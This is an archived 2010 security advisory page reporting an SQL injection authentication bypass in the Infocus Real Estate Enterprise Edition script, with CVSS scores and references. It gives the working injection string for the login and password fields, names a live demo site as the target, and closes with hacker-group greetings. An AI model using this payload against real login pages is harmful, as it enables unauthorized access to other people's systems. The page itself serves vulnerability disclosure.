Infocus Real Estate Enterprise Edition script Auth Bypass

2010.05.04
Credit: Sid3^effects
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title:Authentication bypass in Infocus Real Estate Enterprise Edition script # Date: 27-apr-2010 # Author: Sid3^effects # Software Link: N/a # CVE : [] # Code : [] ______________________________________________________________________________ Authentication bypass in Infocus Real Estate Enterprise Edition script Vendor:www.instantrankingseo.com _______________________Author:Sid3^effects aKa haRi____________________________ Description : Infocus Real Estate Enterprise Edition, is a complete power packed script with tons of powerful features. You can now have your own Real Estate Script similar to 99acres.com, makaan.com or magicbricks.com. The script is very handy and completely customizable. Below are some of the outstanding features of this script. --------------------------------------------------------------------------- * Authentication bypass: The following script has authentication bypass. use ' or 1=1 or ''=' in both login and password. DEMO URL :http://makaanwakaan.com/login.php ShoutZ : ------- ---Indian Cyber warriors--Andhra hackers-- Greetz : -------- ---*L0rd rusAd?r*---d4rk-blu?? [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MaYuR--

References:

http://www.vupen.com/english/advisories/2010/1014
http://www.securityfocus.com/bid/39731
http://www.exploit-db.com/exploits/12415
http://secunia.com/advisories/39625
http://packetstormsecurity.org/1004-exploits/ireee-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top